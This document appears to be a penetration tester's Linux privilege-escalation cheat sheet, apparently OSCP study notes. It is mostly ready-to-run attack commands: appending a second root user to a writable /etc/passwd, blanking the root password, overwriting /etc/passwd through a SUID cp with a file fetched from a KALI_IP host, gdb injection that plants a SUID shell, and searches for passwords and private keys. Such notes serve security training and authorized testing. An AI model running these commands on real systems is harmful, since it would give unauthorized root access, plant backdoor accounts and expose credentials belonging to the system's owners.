Privilege Escalation on Unix

• Testing for Privilege Escalation (WSTG-ATHZ-03)
• https://gtfobins.github.io
• Users and groups
• Basic Linux Privilege Escalation (VERY USEFUL!)

💡 A MUST READ: Basic Linux Privilege Escalation

❗ TRY REUSING PASSWORDS ALREADY FOUND!!!

Look for:

• Misconfigured services
• File permissions on binaries or services
• OS/Kernel vulnerabilities
• Vulnerable software running with high privileges
• Sensitive information stored in local files – like hard coded credentials
• Registry settings that always elevate privileges before executing a binary
• Other, be creative… 😉

Daemons
Kernel
Password Mining
    Logs
    Memory
    History
    Configuration Files
Sudo
    Shell Escape Sequences
    Abuse Intended Functionality
    LD_PRELOAD/LD_LIBRARY_PATH
NFS
Cron
    Path
    Wildcards
    File Overwrite
File Permissions
    SUID Binaries
        Shared Object Injection
        Symlink
        Environment Variables
    Startup Scripts
    Configuration Files

User Enumeration

whoami; id

cat /etc/passwd

Host

Hostname

Hostname can give indication of the server’s purpose and OS. Host naming convention could be used to discover more targets.

hostname

OS / Architecture

cat /etc/issue

cat /etc/*-release

uname -a

Processes & Services

Look for processes running with high privileged accounts, and with insecure permissions or vulnerabilities.

List all processes with or without tty

ps aux

Network

Can be used to pivot 😉

ip a

ifconfig

/sbin/route

/usr/bin/routel

Listening ports and established sessions

netstat -antp

ss -antp

ss -anp

Firewall

Listing firewall rules using iptables require root privileges. See iptables.

ls -la /etc/iptables*

grep -Ril "iptables" /etc/ 2>/dev/null

Scheduled Jobs

Look for scripts in scheduled jobs that can be modified and run as high privileged users. See Unix Insecure file permissions.

crontab -l

cat /etc/crontab

ls -la /etc/cron*

grep "CRON" /var/log/cron.log

Software Versions

Debian-based Linux

dpkg -l

Redhat-based Linux

TO VALIDATE 😉 See rpm.

rpm -l

Permissions on files

NOTE: 2>/dev/null will remove all the “Permission denied” errors.

/etc/passwd

• Editing /etc/passwd File for Privilege Escalation

When this file is writable, add a second root user. Password must be 8 characters max.

openssl passwd PreciouS
echo 'root2:aXtpgGKLlFzqo:0:0:root:/root:/bin/bash' >> /etc/passwd

echo root2:$(openssl passwd PreciouS):0:0:root:/root:/bin/bash >> /etc/passwd

ssh root2@x.x.x.x
[PreciouS]

Other option is to remove root password by removing the ‘x’ or ‘*’.

sed 's/root:x:/root::/' /etc/passwd > /tmp/newpasswd
cp /tmp/newpasswd /etc/passwd

suid on cp (-rwsr-xr-x)

ls -la /usr/bin/cp

cat /etc/passwd

Copy the content of /etc/passwd locally on kali linux. Edit the file to add a new user. Share the file and copy it to the victim in /tmp.

curl -o /tmp/passwd http://KALI_IP/passwd
cp /tmp/passwd /etc/passwd

ssh root2@x.x.x.x
[Preciou$]

Executable writable by others and owned by root

find -P / -type f -executable -user root -perm -o=w -name '*' 2>/dev/null -exec ls -la {} \;

Executable writable by others and owned by root with suid set… jackpot!

find -P / -type f -executable -user root -perm -o=w,u=s -name '*' 2>/dev/null -exec ls -la {} \;

Files readable by others and owned by another user

find -P / -user <username> -perm -o=r -name '*' 2>/dev/null -exec ls -la {} \;

suid & sgid files

find . -perm /6000 2>/dev/null -exec ls -la {} \;

Files modified after adding a new user (can use any other file for comparison)

find -newer /etc/passwd 2>/dev/null -exec ls -la {} \;

Files that were edited within the last hour

find -mmin -60 2>/dev/null -exec ls -la {} \;

Find writable files / dirs outside of your home directory

find / -writable -type f -o -writable -type d 2>/dev/null | grep -Ev "^(/proc|/home/<USERNAME>|/tmp)"

Find directories writable by the current user

find / -writable -type d 2>/dev/null

Sensitive files or information

Look fo sensitive information.

Backups

locate *.bak
find / -name *.bak 2>/dev/null -exec ls -la {} \;

RSA private keys

locate *rsa*
locate *_key*

find / -name *private* -type f -readable 2>/dev/null -exec ls -la {} \;
find / -name *_key* -type f -readable 2>/dev/null -exec ls -la {} \;

Check if Message of the Day (MOTD) is writable

ls -la /etc/update-motd.d

Look for hardcoded credentials in files

grep -Ril "flag" .
grep -Ri "password" .
grep -Ri "key" .
grep -Ri "sessionkey" .
grep -Ri "admin" .

To test, might cause problems…

grep -Ril "flag" / 2>/dev/null
grep -Ri "password" . 2>/dev/null
grep -Ri "key" . 2>/dev/null
grep -Ri "sessionkey" . 2>/dev/null
grep -Ri "admin" . 2>/dev/null

Unmounted Disks

cat /etc/fstab

mount

See lsblk.

/bin/lsblk

Device Drivers & Kernel Modules

Loaded kernel modules

lsmod

/sbin/modinfo <module name>

Binaries That AutoElevate

SUID: run with the permission of the file owner instead of the user that runs it.

Be creative 😉 If the copy command has SUID, overwrite sensitive files like /etc/passwd.

find / -perm -u=s -type f 2>/dev/null

Command history

Look for passwords entered on the command line or interesting scripts that were executed.

history

journalctl

Sudo

sudo -l

• Check the content of custom scripts that can be run and see if they can be exploited.
• Check binaries that can be run and if their is a known method to exploit on GTFObins.
• If the output contains “env_keep+=LD_PRELOAD”, see Linux Sudo LD_PRELOAD Privilege Escalation.

Automation

linpeas is authorized for OSCP exam but check the version!!! See this post from Offensive Security.

grep -a1 "Injecting process" linpeas.sh

Forbidden auto-exploit line:

echo 'call system("echo | sudo -S cp /bin/sh /tmp/shrndom >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/shrndom >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1

In newer versions, should be:

echo 'call system("echo | sudo -S touch /tmp/shrndom32r2r >/dev/null 2>&1 && echo | sudo -S chmod 777 /tmp/shrndom32r2r >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1

unix-privesc-check

See unix-privesc-check. Already on Kali Linux but can download here.

Download – victim has no internet connection

Host the file on Kali and download on the target

sudo cp /usr/bin/unix-privesc-check /var/www/html/
sudo service apache2 start

wget -O unix-privesc-check http://<KALI_IP>/unix-privesc-check

Help

./unix-privesc-check

Standard

Speed-optimized check of lots of security settings.

./unix-privesc-check standard > standard.txt
grep WARNING standard.txt

Detailed

This mode is slow and prone to false positives but might help you find more subtle flaws in 3rd party programs.

./unix-privesc-check detailed > detailed.txt
grep WARNING detailed.txt

LinEnum

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

chmod u+x LinEnum.sh
./LinEnum.sh

Privilege Escalation Techniques

• Kernel driver vulnerabilities (TO VALIDATE)
• Unix Insecure file permissions
• DirtyCow
• Polkit’s pkexec utility exploit (CVE-2021-4034)
• Reusing Sudo Tokens
• Linux Privilege Escalation Using PATH Variable (Hacking Articles)